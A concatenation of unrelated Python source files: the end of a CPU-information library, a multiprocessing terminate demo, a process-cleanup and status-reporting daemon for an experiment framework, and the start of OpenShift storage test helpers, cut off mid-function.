# If sysinfo fails return {}
returncode, output = DataSource.sysinfo_cpu()
if output == None or returncode != 0:
return {}
# Various fields
vendor_id = '' #_get_field(False, output, None, None, 'CPU #0: ')
processor_brand = output.split('CPU #0: "')[1].split('"\n')[0]
cache_size = '' #_get_field(False, output, None, None, 'machdep.cpu.cache.size')
signature = output.split('Signature:')[1].split('\n')[0].strip()
#
stepping = int(signature.split('stepping ')[1].split(',')[0].strip())
model = int(signature.split('model ')[1].split(',')[0].strip())
family = int(signature.split('family ')[1].split(',')[0].strip())
# Flags
def get_subsection_flags(output):
retval = []
for line in output.split('\n')[1:]:
if not line.startswith(' '): break
for entry in line.strip().lower().split(' '):
retval.append(entry)
return retval
flags = get_subsection_flags(output.split('Features: ')[1]) + \
get_subsection_flags(output.split('Extended Features (0x00000001): ')[1]) + \
get_subsection_flags(output.split('Extended Features (0x80000001): ')[1])
flags.sort()
# Convert from GHz/MHz string to Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
hz_actual = hz_advertised
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, scale),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, scale),
'l2_cache_size' : to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_wmic():
'''
Returns the CPU info gathered from WMI.
Returns {} if not on Windows, or wmic is not installed.
'''
try:
# Just return {} if not Windows or there is no wmic
if not DataSource.is_windows or not DataSource.has_wmic():
return {}
returncode, output = DataSource.wmic_cpu()
if output == None or returncode != 0:
return {}
# Break the list into key values pairs
value = output.split("\n")
value = [s.rstrip().split('=') for s in value if '=' in s]
value = {k: v for k, v in value if v}
# Get the advertised MHz
processor_brand = value.get('Name')
scale_advertised, hz_advertised = _get_hz_string_from_brand(processor_brand)
# Get the actual MHz
hz_actual = value.get('CurrentClockSpeed')
scale_actual = 6
if hz_actual:
hz_actual = to_hz_string(hz_actual)
# Get cache sizes
l2_cache_size = value.get('L2CacheSize')
if l2_cache_size:
l2_cache_size = l2_cache_size + ' KB'
l3_cache_size = value.get('L3CacheSize')
if l3_cache_size:
l3_cache_size = l3_cache_size + ' KB'
# Get family, model, and stepping
family, model, stepping = '', '', ''
description = value.get('Description') or value.get('Caption')
entries = description.split(' ')
if 'Family' in entries and entries.index('Family') < len(entries)-1:
i = entries.index('Family')
family = int(entries[i + 1])
if 'Model' in entries and entries.index('Model') < len(entries)-1:
i = entries.index('Model')
model = int(entries[i + 1])
if 'Stepping' in entries and entries.index('Stepping') < len(entries)-1:
i = entries.index('Stepping')
stepping = int(entries[i + 1])
info = {
'vendor_id' : value.get('Manufacturer'),
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale_advertised),
'hz_actual' : to_friendly_hz(hz_actual, scale_actual),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale_advertised),
'hz_actual_raw' : to_raw_hz(hz_actual, scale_actual),
'l2_cache_size' : l2_cache_size,
'l3_cache_size' : l3_cache_size,
'stepping' : stepping,
'model' : model,
'family' : family,
}
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_registry():
'''
FIXME: Is missing many of the newer CPU flags like sse3
Returns the CPU info gathered from the Windows Registry.
Returns {} if not on Windows.
'''
try:
# Just return {} if not on Windows
if not DataSource.is_windows:
return {}
# Get the CPU name
processor_brand = DataSource.winreg_processor_brand()
# Get the CPU vendor id
vendor_id = DataSource.winreg_vendor_id()
# Get the CPU arch and bits
raw_arch_string = DataSource.winreg_raw_arch_string()
arch, bits = parse_arch(raw_arch_string)
# Get the actual CPU Hz
hz_actual = DataSource.winreg_hz_actual()
hz_actual = to_hz_string(hz_actual)
# Get the advertised CPU Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
# Get the CPU features
feature_bits = DataSource.winreg_feature_bits()
def is_set(bit):
mask = 0x80000000 >> bit
retval = mask & feature_bits > 0
return retval
# http://en.wikipedia.org/wiki/CPUID
# http://unix.stackexchange.com/questions/43539/what-do-the-flags-in-proc-cpuinfo-mean
# http://www.lohninger.com/helpcsuite/public_constants_cpuid.htm
flags = {
'fpu' : is_set(0), # Floating Point Unit
'vme' : is_set(1), # V86 Mode Extensions
'de' : is_set(2), # Debug Extensions - I/O breakpoints supported
'pse' : is_set(3), # Page Size Extensions (4 MB pages supported)
'tsc' : is_set(4), # Time Stamp Counter and RDTSC instruction are available
'msr' : is_set(5), # Model Specific Registers
'pae' : is_set(6), # Physical Address Extensions (36 bit address, 2MB pages)
'mce' : is_set(7), # Machine Check Exception supported
'cx8' : is_set(8), # Compare Exchange Eight Byte instruction available
'apic' : is_set(9), # Local APIC present (multiprocessor operation support)
'sepamd' : is_set(10), # Fast system calls (AMD only)
'sep' : is_set(11), # Fast system calls
'mtrr' : is_set(12), # Memory Type Range Registers
'pge' : is_set(13), # Page Global Enable
'mca' : is_set(14), # Machine Check Architecture
'cmov' : is_set(15), # Conditional MOVe instructions
'pat' : is_set(16), # Page Attribute Table
'pse36' : is_set(17), # 36 bit Page Size Extensions
'serial' : is_set(18), # Processor Serial Number
'clflush' : is_set(19), # Cache Flush
#'reserved1' : is_set(20), # reserved
'dts' : is_set(21), # Debug Trace Store
'acpi' : is_set(22), # ACPI support
'mmx' : is_set(23), # MultiMedia Extensions
'fxsr' : is_set(24), # FXSAVE and FXRSTOR instructions
'sse' : is_set(25), # SSE instructions
'sse2' : is_set(26), # SSE2 (WNI) instructions
'ss' : is_set(27), # self snoop
#'reserved2' : is_set(28), # reserved
'tm' : is_set(29), # Automatic clock control
'ia64' : is_set(30), # IA64 instructions
'3dnow' : is_set(31) # 3DNow! instructions available
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
flags.sort()
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, 6),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, 6),
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_kstat():
'''
Returns the CPU info gathered from isainfo and kstat.
Returns {} if isainfo or kstat are not found.
'''
try:
# Just return {} if there is no isainfo or kstat
if not DataSource.has_isainfo() or not DataSource.has_kstat():
return {}
# If isainfo fails return {}
returncode, flag_output = DataSource.isainfo_vb()
if flag_output == None or returncode != 0:
return {}
# If kstat fails return {}
returncode, kstat = DataSource.kstat_m_cpu_info()
if kstat == None or returncode != 0:
return {}
# Various fields
vendor_id = kstat.split('\tvendor_id ')[1].split('\n')[0].strip()
processor_brand = kstat.split('\tbrand ')[1].split('\n')[0].strip()
stepping = int(kstat.split('\tstepping ')[1].split('\n')[0].strip())
model = int(kstat.split('\tmodel ')[1].split('\n')[0].strip())
family = int(kstat.split('\tfamily ')[1].split('\n')[0].strip())
# Flags
flags = flag_output.strip().split('\n')[-1].strip().lower().split()
flags.sort()
# Convert from GHz/MHz string to Hz
scale = 6
hz_advertised = kstat.split('\tclock_MHz ')[1].split('\n')[0].strip()
hz_advertised = to_hz_string(hz_advertised)
# Convert from GHz/MHz string to Hz
hz_actual = kstat.split('\tcurrent_clock_Hz ')[1].split('\n')[0].strip()
hz_actual = to_hz_string(hz_actual)
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, 0),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, 0),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def CopyNewFields(info, new_info):
keys = [
'vendor_id', 'hardware', 'brand', 'hz_advertised', 'hz_actual',
'hz_advertised_raw', 'hz_actual_raw', 'arch', 'bits', 'count',
'raw_arch_string', 'l2_cache_size', 'l2_cache_line_size',
'l2_cache_associativity', 'stepping', 'model', 'family',
'processor_type', 'extended_model', 'extended_family', 'flags',
'l3_cache_size', 'l1_data_cache_size', 'l1_instruction_cache_size'
]
for key in keys:
if new_info.get(key, None) and not info.get(key, None):
info[key] = new_info[key]
elif key == 'flags' and new_info.get('flags'):
for f in new_info['flags']:
if f not in info['flags']: info['flags'].append(f)
info['flags'].sort()
def get_cpu_info():
'''
Returns the CPU info by using the best sources of information for your OS.
Returns {} if nothing is found.
'''
# Get the CPU arch and bits
arch, bits = parse_arch(DataSource.raw_arch_string)
friendly_maxsize = { 2**31-1: '32 bit', 2**63-1: '64 bit' }.get(sys.maxsize) or 'unknown bits'
friendly_version = "{0}.{1}.{2}.{3}.{4}".format(*sys.version_info)
PYTHON_VERSION = "{0} ({1})".format(friendly_version, friendly_maxsize)
info = {
'python_version' : PYTHON_VERSION,
'cpuinfo_version' : CPUINFO_VERSION,
'arch' : arch,
'bits' : bits,
'count' : DataSource.cpu_count,
'raw_arch_string' : DataSource.raw_arch_string,
}
# Try the Windows wmic
CopyNewFields(info, _get_cpu_info_from_wmic())
# Try the Windows registry
CopyNewFields(info, _get_cpu_info_from_registry())
# Try /proc/cpuinfo
CopyNewFields(info, _get_cpu_info_from_proc_cpuinfo())
# Try cpufreq-info
CopyNewFields(info, _get_cpu_info_from_cpufreq_info())
# Try LSCPU
CopyNewFields(info, _get_cpu_info_from_lscpu())
# Try sysctl
CopyNewFields(info, _get_cpu_info_from_sysctl())
# Try kstat
CopyNewFields(info, _get_cpu_info_from_kstat())
# Try dmesg
CopyNewFields(info, _get_cpu_info_from_dmesg())
# Try /var/run/dmesg.boot
CopyNewFields(info, _get_cpu_info_from_cat_var_run_dmesg_boot())
# Try lsprop ibm,pa-features
CopyNewFields(info, _get_cpu_info_from_ibm_pa_features())
# Try sysinfo
CopyNewFields(info, _get_cpu_info_from_sysinfo())
# Try querying the CPU cpuid register
CopyNewFields(info, _get_cpu_info_from_cpuid())
return info
# Make sure we are running on a supported system
def _check_arch():
arch, bits = parse_arch(DataSource.raw_arch_string)
if not arch in ['X86_32', 'X86_64', 'ARM_7', 'ARM_8', 'PPC_64']:
raise Exception("py-cpuinfo currently only works on X86 and some PPC and ARM CPUs.")
def main():
try:
_check_arch()
except Exception as err:
sys.stderr.write(str(err) + "\n")
sys.exit(1)
info = get_cpu_info()
if info:
print('python version: {0}'.format(info.get('python_version', '')))
print('cpuinfo version: {0}'.format(info.get('cpuinfo_version', '')))
print('Vendor ID: {0}'.format(info.get('vendor_id', '')))
print('Hardware Raw: {0}'.format(info.get('hardware', '')))
print('Brand: {0}'.format(info.get('brand', '')))
print('Hz Advertised: {0}'.format(info.get('hz_advertised', '')))
print('Hz Actual: {0}'.format(info.get('hz_actual', '')))
print('Hz Advertised Raw: {0}'.format(info.get('hz_advertised_raw', '')))
print('Hz Actual Raw: {0}'.format(info.get('hz_actual_raw', '')))
print('Arch: {0}'.format(info.get('arch', '')))
print('Bits: {0}'.format(info.get('bits', '')))
print('Count: {0}'.format(info.get('count', '')))
print('Raw Arch String: {0}'.format(info.get('raw_arch_string', '')))
print('L1 Data Cache Size: {0}'.format(info.get('l1_data_cache_size', '')))
print('L1 Instruction Cache Size: {0}'.format(info.get('l1_instruction_cache_size', '')))
print('L2 Cache Size: {0}'.format(info.get('l2_cache_size', '')))
print('L2 Cache Line Size: {0}'.format(info.get('l2_cache_line_size', '')))
print('L2 Cache Associativity: {0}'.format(info.get('l2_cache_associativity', '')))
print('L3 Cache Size: {0}'.format(info.get('l3_cache_size', '')))
print('Stepping: {0}'.format(info.get('stepping', '')))
print('Model: {0}'.format(info.get('model', '')))
print('Family: {0}'.format(info.get('family', '')))
print('Processor Type: {0}'.format(info.get('processor_type', '')))
print('Extended Model: {0}'.format(info.get('extended_model', '')))
print('Extended Family: {0}'.format(info.get('extended_family', '')))
print('Flags: {0}'.format(', '.join(info.get('flags', ''))))
else:
sys.stderr.write("Failed to find cpu info\n")
sys.exit(1)
if __name__ == '__main__':
from multiprocessing import freeze_support
freeze_support()
main()
else:
_check_arch()
|
kill_a_process.py |
import multiprocessing
import time
"""
importante
possiveis valores de código de saída
1. ==0 : não houve erros
2. >0: houve erro
3. <0: não ouve erro, mas o processo foi matado, onde o valor significa -1 * ExitCode
"""
def foo():
print ('Starting function')
time.sleep(0.1)
print ('Finished function')
if __name__ == '__main__':
p = multiprocessing.Process(target=foo)
print ('Process before execution:', p, p.is_alive())
p.start()
print ('Process running:', p, p.is_alive())
p.terminate()
# time.sleep(5) # my modification
"""
Quando coloco esse termporizado de 5 segundos, a saída fica assim
Process before execution: <Process name='Process-1' parent=11720 initial> False
Process running: <Process name='Process-1' pid=11721 parent=11720 started> True
Process terminated: <Process name='Process-1' pid=11721 parent=11720 stopped exitcode=-SIGTERM> False
Process joined: <Process name='Process-1' pid=11721 parent=11720 stopped exitcode=-SIGTERM> False
Process exit code: -15
#######
ou seja, é como se o processo terminasse depois da execução da próxima instrução, o que não deveria acontecer
"""
print ('Process terminated:', p, p.is_alive())
p.join()
print ('Process joined:', p, p.is_alive())
print ('Process exit code:', p.exitcode)
"""
Process before execution: <Process name='Process-1' parent=11490 initial> False
Process running: <Process name='Process-1' pid=11491 parent=11490 started> True
Process terminated: <Process name='Process-1' pid=11491 parent=11490 started> True
Process joined: <Process name='Process-1' pid=11491 parent=11490 stopped exitcode=-SIGTERM> False
Process exit code: -15
"""
|
hmp_daemon.py | import time, requests, threading, os, atexit
from UTILS.colorful import *
import psutil
def kill_process(p):
try:
# print('正在发送terminate命令到进程:', os.getpid(), '-->', p.pid)
p.terminate()
_, alive = psutil.wait_procs([p,], timeout=0.1) # 先等 100ms
if len(alive):
_, alive = psutil.wait_procs(alive, timeout=3.0) # 再等 3s
if len(alive):
# print('\t (R1) 很遗憾, 进程不服从terminate信号, 正在发送kill-9命令到进程:', os.getpid(), '-->', p.pid)
for p in alive: p.kill()
else:
# print('\t (R2) 进程成功结束')
pass
else:
# print('\t (R2) 进程成功结束')
pass
except Exception as e:
print(e)
def kill_process_and_its_children(p):
p = psutil.Process(p.pid) # p might be Python's process, convert to psutil's process
if len(p.children())>0:
# print('有子进程')
for child in p.children():
if hasattr(child,'children') and len(child.children())>0:
kill_process_and_its_children(child)
else:
kill_process(child)
else:
pass
# print('无子进程')
kill_process(p)
def kill_process_children(p):
p = psutil.Process(p.pid) # p might be Python's process, convert to psutil's process
if len(p.children())>0:
# print('有子进程')
for child in p.children():
if hasattr(child,'children') and len(child.children())>0:
kill_process_and_its_children(child)
else:
kill_process(child)
else:
pass
# print('无子进程')
def clean_child_process(pid):
parent = psutil.Process(pid)
kill_process_children(parent)
def hmp_clean_up():
from UTILS.exp_upload import upload_experiment_results
from config import GlobalConfig as cfg
print亮黄('[main.py] upload results to storage server via SSH')
if cfg.allow_res_upload: upload_experiment_results(cfg)
print亮黄('[main.py] kill all children process, then self-terminate.')
clean_child_process(os.getpid())
def start_periodic_daemon(cfg):
print('[hmp_daemon.py] Disable periodic daemon to debug.')
return
periodic_thread = threading.Thread(target=periodic_daemon,args=(cfg,))
periodic_thread.setDaemon(True)
periodic_thread.start()
for i in range(100):
time.sleep(1)
print(i)
atexit.register(hmp_clean_up)
def periodic_daemon(cfg):
while True:
try:
print('start periodic_daemon_(cfg)')
periodic_daemon_(cfg)
print('end periodic_daemon_(cfg)')
except AssertionError:
hmp_clean_up()
except BaseException:
print('hmp server failed')
break
time.sleep(15*60)
def periodic_daemon_(cfg):
report = {
'type': 'hmp-client',
'note': cfg.note,
'time': time.strftime("%Y-%m-%d-%H:%M:%S", time.localtime()),
'client_status': 'Running',
'StartingTime': cfg.machine_info['StartDateTime'],
'HostIP': cfg.machine_info['HostIP'],
'ExpUUID': cfg.machine_info['ExpUUID'],
'RunPath':cfg.machine_info['RunPath'],
'DockerContainerHash':cfg.machine_info['DockerContainerHash']
}
res = requests.post('http://linux.ipv4.fuqingxu.top:11511/',data = report)
if res.text=='Stop_Now':
report['client_status'] = 'Terminate'
requests.post('http://linux.ipv4.fuqingxu.top:11511/',data = report)
raise AssertionError('HMP-Center Has Given Terminate Signal!') |
helpers.py | """
Helper functions file for OCS QE
"""
import base64
import random
import datetime
import hashlib
import json
import logging
import os
import re
import statistics
import tempfile
import threading
import time
import inspect
from concurrent.futures import ThreadPoolExecutor
from itertools import cycle
from subprocess import PIPE, TimeoutExpired, run
from uuid import uuid4
import yaml
from ocs_ci.framework import config
from ocs_ci.helpers.proxy import (
get_cluster_proxies,
update_container_with_proxy_env,
)
from ocs_ci.ocs.utils import mirror_image
from ocs_ci.ocs import constants, defaults, node, ocp
from ocs_ci.ocs.exceptions import (
CommandFailed,
ResourceWrongStatusException,
TimeoutExpiredError,
UnavailableBuildException,
UnexpectedBehaviour,
)
from ocs_ci.ocs.ocp import OCP
from ocs_ci.ocs.resources import pod, pvc
from ocs_ci.ocs.resources.ocs import OCS
from ocs_ci.utility import templating
from ocs_ci.utility.retry import retry
from ocs_ci.utility.utils import (
TimeoutSampler,
ocsci_log_path,
run_cmd,
update_container_with_mirrored_image,
)
logger = logging.getLogger(__name__)
DATE_TIME_FORMAT = "%Y I%m%d %H:%M:%S.%f"
def create_unique_resource_name(resource_description, resource_type):
"""
Creates a unique object name by using the object_description,
object_type and a random uuid(in hex) as suffix trimmed due to
kubernetes limitation of 63 characters
Args:
resource_description (str): The user provided object description
resource_type (str): The type of object for which the unique name
will be created. For example: project, pvc, etc
Returns:
str: A unique name
"""
name = f"{resource_type}-{resource_description[:23]}-{uuid4().hex}"
return name if len(name) < 40 else name[:40]
def create_resource(do_reload=True, **kwargs):
"""
Create a resource
Args:
do_reload (bool): True for reloading the resource following its creation,
False otherwise
kwargs (dict): Dictionary of the OCS resource
Returns:
OCS: An OCS instance
Raises:
AssertionError: In case of any failure
"""
ocs_obj = OCS(**kwargs)
resource_name = kwargs.get("metadata").get("name")
created_resource = ocs_obj.create(do_reload=do_reload)
assert created_resource, f"Failed to create resource {resource_name}"
return ocs_obj
def wait_for_resource_state(resource, state, timeout=60):
"""
Wait for a resource to get to a given status
Args:
resource (OCS obj): The resource object
state (str): The status to wait for
timeout (int): Time in seconds to wait
Raises:
ResourceWrongStatusException: In case the resource hasn't
reached the desired state
"""
if (
resource.name == constants.DEFAULT_STORAGECLASS_CEPHFS
or resource.name == constants.DEFAULT_STORAGECLASS_RBD
):
logger.info("Attempt to default default Secret or StorageClass")
return
try:
resource.ocp.wait_for_resource(
condition=state, resource_name=resource.name, timeout=timeout
)
except TimeoutExpiredError:
logger.error(f"{resource.kind} {resource.name} failed to reach {state}")
resource.reload()
raise ResourceWrongStatusException(resource.name, resource.describe())
logger.info(f"{resource.kind} {resource.name} reached state {state}")
def create_pod(
interface_type=None,
pvc_name=None,
do_reload=True,
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
node_name=None,
pod_dict_path=None,
sa_name=None,
dc_deployment=False,
raw_block_pv=False,
raw_block_device=constants.RAW_BLOCK_DEVICE,
replica_count=1,
pod_name=None,
node_selector=None,
command=None,
command_args=None,
deploy_pod_status=constants.STATUS_COMPLETED,
subpath=None,
):
"""
Create a pod
Args:
interface_type (str): The interface type (CephFS, RBD, etc.)
pvc_name (str): The PVC that should be attached to the newly created pod
do_reload (bool): True for reloading the object after creation, False otherwise
namespace (str): The namespace for the new resource creation
node_name (str): The name of specific node to schedule the pod
pod_dict_path (str): YAML path for the pod
sa_name (str): Serviceaccount name
dc_deployment (bool): True if creating pod as deploymentconfig
raw_block_pv (bool): True for creating raw block pv based pod, False otherwise
raw_block_device (str): raw block device for the pod
replica_count (int): Replica count for deployment config
pod_name (str): Name of the pod to create
node_selector (dict): dict of key-value pair to be used for nodeSelector field
eg: {'nodetype': 'app-pod'}
command (list): The command to be executed on the pod
command_args (list): The arguments to be sent to the command running
on the pod
deploy_pod_status (str): Expected status of deploy pod. Applicable
only if dc_deployment is True
subpath (str): Value of subPath parameter in pod yaml
Returns:
Pod: A Pod instance
Raises:
AssertionError: In case of any failure
"""
if (
interface_type == constants.CEPHBLOCKPOOL
or interface_type == constants.CEPHBLOCKPOOL_THICK
):
pod_dict = pod_dict_path if pod_dict_path else constants.CSI_RBD_POD_YAML
interface = constants.RBD_INTERFACE
else:
pod_dict = pod_dict_path if pod_dict_path else constants.CSI_CEPHFS_POD_YAML
interface = constants.CEPHFS_INTERFACE
if dc_deployment:
pod_dict = pod_dict_path if pod_dict_path else constants.FEDORA_DC_YAML
pod_data = templating.load_yaml(pod_dict)
if not pod_name:
pod_name = create_unique_resource_name(f"test-{interface}", "pod")
pod_data["metadata"]["name"] = pod_name
pod_data["metadata"]["namespace"] = namespace
if dc_deployment:
pod_data["metadata"]["labels"]["app"] = pod_name
pod_data["spec"]["template"]["metadata"]["labels"]["name"] = pod_name
pod_data["spec"]["replicas"] = replica_count
if pvc_name:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["volumes"][0]["persistentVolumeClaim"][
"claimName"
] = pvc_name
else:
pod_data["spec"]["volumes"][0]["persistentVolumeClaim"][
"claimName"
] = pvc_name
if interface_type == constants.CEPHBLOCKPOOL and raw_block_pv:
if pod_dict_path in [constants.FEDORA_DC_YAML, constants.FIO_DC_YAML]:
temp_dict = [
{
"devicePath": raw_block_device,
"name": pod_data.get("spec")
.get("template")
.get("spec")
.get("volumes")[0]
.get("name"),
}
]
if pod_dict_path == constants.FEDORA_DC_YAML:
del pod_data["spec"]["template"]["spec"]["containers"][0][
"volumeMounts"
]
security_context = {"capabilities": {"add": ["SYS_ADMIN"]}}
pod_data["spec"]["template"]["spec"]["containers"][0][
"securityContext"
] = security_context
pod_data["spec"]["template"]["spec"]["containers"][0][
"volumeDevices"
] = temp_dict
elif (
pod_dict_path == constants.NGINX_POD_YAML
or pod_dict == constants.CSI_RBD_POD_YAML
):
temp_dict = [
{
"devicePath": raw_block_device,
"name": pod_data.get("spec")
.get("containers")[0]
.get("volumeMounts")[0]
.get("name"),
}
]
del pod_data["spec"]["containers"][0]["volumeMounts"]
pod_data["spec"]["containers"][0]["volumeDevices"] = temp_dict
else:
pod_data["spec"]["containers"][0]["volumeDevices"][0][
"devicePath"
] = raw_block_device
pod_data["spec"]["containers"][0]["volumeDevices"][0]["name"] = (
pod_data.get("spec").get("volumes")[0].get("name")
)
if command:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["containers"][0]["command"] = command
else:
pod_data["spec"]["containers"][0]["command"] = command
if command_args:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["containers"][0]["args"] = command_args
else:
pod_data["spec"]["containers"][0]["args"] = command_args
if node_name:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["nodeName"] = node_name
else:
pod_data["spec"]["nodeName"] = node_name
if node_selector:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["nodeSelector"] = node_selector
else:
pod_data["spec"]["nodeSelector"] = node_selector
if sa_name and dc_deployment:
pod_data["spec"]["template"]["spec"]["serviceAccountName"] = sa_name
if subpath:
if dc_deployment:
pod_data["spec"]["template"]["spec"]["containers"][0]["volumeMounts"][0][
"subPath"
] = subpath
else:
pod_data["spec"]["containers"][0]["volumeMounts"][0]["subPath"] = subpath
# overwrite used image (required for disconnected installation)
update_container_with_mirrored_image(pod_data)
# configure http[s]_proxy env variable, if required
update_container_with_proxy_env(pod_data)
if dc_deployment:
ocs_obj = create_resource(**pod_data)
logger.info(ocs_obj.name)
assert (ocp.OCP(kind="pod", namespace=namespace)).wait_for_resource(
condition=deploy_pod_status,
resource_name=pod_name + "-1-deploy",
resource_count=0,
timeout=360,
sleep=3,
)
dpod_list = pod.get_all_pods(namespace=namespace)
for dpod in dpod_list:
if "-1-deploy" not in dpod.name:
if pod_name in dpod.name:
return dpod
else:
pod_obj = pod.Pod(**pod_data)
pod_name = pod_data.get("metadata").get("name")
logger.info(f"Creating new Pod {pod_name} for test")
created_resource = pod_obj.create(do_reload=do_reload)
assert created_resource, f"Failed to create Pod {pod_name}"
return pod_obj
def create_project(project_name=None):
"""
Create a project
Args:
project_name (str): The name for the new project
Returns:
ocs_ci.ocs.ocp.OCP: Project object
"""
namespace = project_name or create_unique_resource_name("test", "namespace")
project_obj = ocp.OCP(kind="Project", namespace=namespace)
assert project_obj.new_project(namespace), f"Failed to create namespace {namespace}"
return project_obj
def create_multilpe_projects(number_of_project):
"""
Create one or more projects
Args:
number_of_project (int): Number of projects to be created
Returns:
list: List of project objects
"""
project_objs = [create_project() for _ in range(number_of_project)]
return project_objs
def create_secret(interface_type):
"""
Create a secret
** This method should not be used anymore **
** This method is for internal testing only **
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
Returns:
OCS: An OCS instance for the secret
"""
secret_data = dict()
if interface_type == constants.CEPHBLOCKPOOL:
secret_data = templating.load_yaml(constants.CSI_RBD_SECRET_YAML)
secret_data["stringData"]["userID"] = constants.ADMIN_USER
secret_data["stringData"]["userKey"] = get_admin_key()
interface = constants.RBD_INTERFACE
elif interface_type == constants.CEPHFILESYSTEM:
secret_data = templating.load_yaml(constants.CSI_CEPHFS_SECRET_YAML)
del secret_data["stringData"]["userID"]
del secret_data["stringData"]["userKey"]
secret_data["stringData"]["adminID"] = constants.ADMIN_USER
secret_data["stringData"]["adminKey"] = get_admin_key()
interface = constants.CEPHFS_INTERFACE
secret_data["metadata"]["name"] = create_unique_resource_name(
f"test-{interface}", "secret"
)
secret_data["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
return create_resource(**secret_data)
def default_ceph_block_pool():
"""
Returns default CephBlockPool
Returns:
default CephBlockPool
"""
sc_obj = default_storage_class(constants.CEPHBLOCKPOOL)
cbp_name = sc_obj.get().get("parameters").get("pool")
return cbp_name if cbp_name else constants.DEFAULT_BLOCKPOOL
def create_ceph_block_pool(
pool_name=None, replica=3, compression=None, failure_domain=None, verify=True
):
"""
Create a Ceph block pool
** This method should not be used anymore **
** This method is for internal testing only **
Args:
pool_name (str): The pool name to create
failure_domain (str): Failure domain name
verify (bool): True to verify the pool exists after creation,
False otherwise
replica (int): The replica size for a pool
compression (str): Compression type for a pool
Returns:
OCS: An OCS instance for the Ceph block pool
"""
cbp_data = templating.load_yaml(constants.CEPHBLOCKPOOL_YAML)
cbp_data["metadata"]["name"] = (
pool_name if pool_name else create_unique_resource_name("test", "cbp")
)
cbp_data["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
cbp_data["spec"]["replicated"]["size"] = replica
cbp_data["spec"]["failureDomain"] = failure_domain or get_failure_domin()
if compression:
cbp_data["spec"]["compressionMode"] = compression
cbp_data["spec"]["parameters"]["compression_mode"] = compression
cbp_obj = create_resource(**cbp_data)
cbp_obj.reload()
if verify:
assert verify_block_pool_exists(
cbp_obj.name
), f"Block pool {cbp_obj.name} does not exist"
return cbp_obj
def create_ceph_file_system(pool_name=None):
"""
Create a Ceph file system
** This method should not be used anymore **
** This method is for internal testing only **
Args:
pool_name (str): The pool name to create
Returns:
OCS: An OCS instance for the Ceph file system
"""
cfs_data = templating.load_yaml(constants.CEPHFILESYSTEM_YAML)
cfs_data["metadata"]["name"] = (
pool_name if pool_name else create_unique_resource_name("test", "cfs")
)
cfs_data["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE
cfs_data = create_resource(**cfs_data)
cfs_data.reload()
assert validate_cephfilesystem(
cfs_data.name
), f"File system {cfs_data.name} does not exist"
return cfs_data
def default_storage_class(
interface_type,
):
"""
Return default storage class based on interface_type
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
Returns:
OCS: Existing StorageClass Instance
"""
external = config.DEPLOYMENT["external_mode"]
if interface_type == constants.CEPHBLOCKPOOL:
if external:
resource_name = constants.DEFAULT_EXTERNAL_MODE_STORAGECLASS_RBD
else:
resource_name = constants.DEFAULT_STORAGECLASS_RBD
base_sc = OCP(kind="storageclass", resource_name=resource_name)
elif interface_type == constants.CEPHFILESYSTEM:
if external:
resource_name = constants.DEFAULT_EXTERNAL_MODE_STORAGECLASS_CEPHFS
else:
resource_name = constants.DEFAULT_STORAGECLASS_CEPHFS
base_sc = OCP(kind="storageclass", resource_name=resource_name)
base_sc.wait_for_resource(
condition=resource_name,
column="NAME",
timeout=240,
)
sc = OCS(**base_sc.data)
return sc
def default_thick_storage_class():
"""
Return default RBD thick storage class
Returns:
OCS: Existing RBD thick StorageClass instance
"""
external = config.DEPLOYMENT["external_mode"]
if external:
resource_name = constants.DEFAULT_EXTERNAL_MODE_STORAGECLASS_RBD_THICK
else:
resource_name = constants.DEFAULT_STORAGECLASS_RBD_THICK
base_sc = OCP(kind="storageclass", resource_name=resource_name)
sc = OCS(**base_sc.data)
return sc
def create_storage_class(
interface_type,
interface_name,
secret_name,
reclaim_policy=constants.RECLAIM_POLICY_DELETE,
sc_name=None,
provisioner=None,
rbd_thick_provision=False,
encrypted=False,
encryption_kms_id=None,
fs_name=None,
):
"""
Create a storage class
** This method should not be used anymore **
** This method is for internal testing only **
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
interface_name (str): The name of the interface
secret_name (str): The name of the secret
sc_name (str): The name of storage class to create
reclaim_policy (str): Type of reclaim policy. Defaults to 'Delete'
(eg., 'Delete', 'Retain')
rbd_thick_provision (bool): True to enable RBD thick provisioning.
Applicable if interface_type is CephBlockPool
encrypted (bool): True to create encrypted SC else False
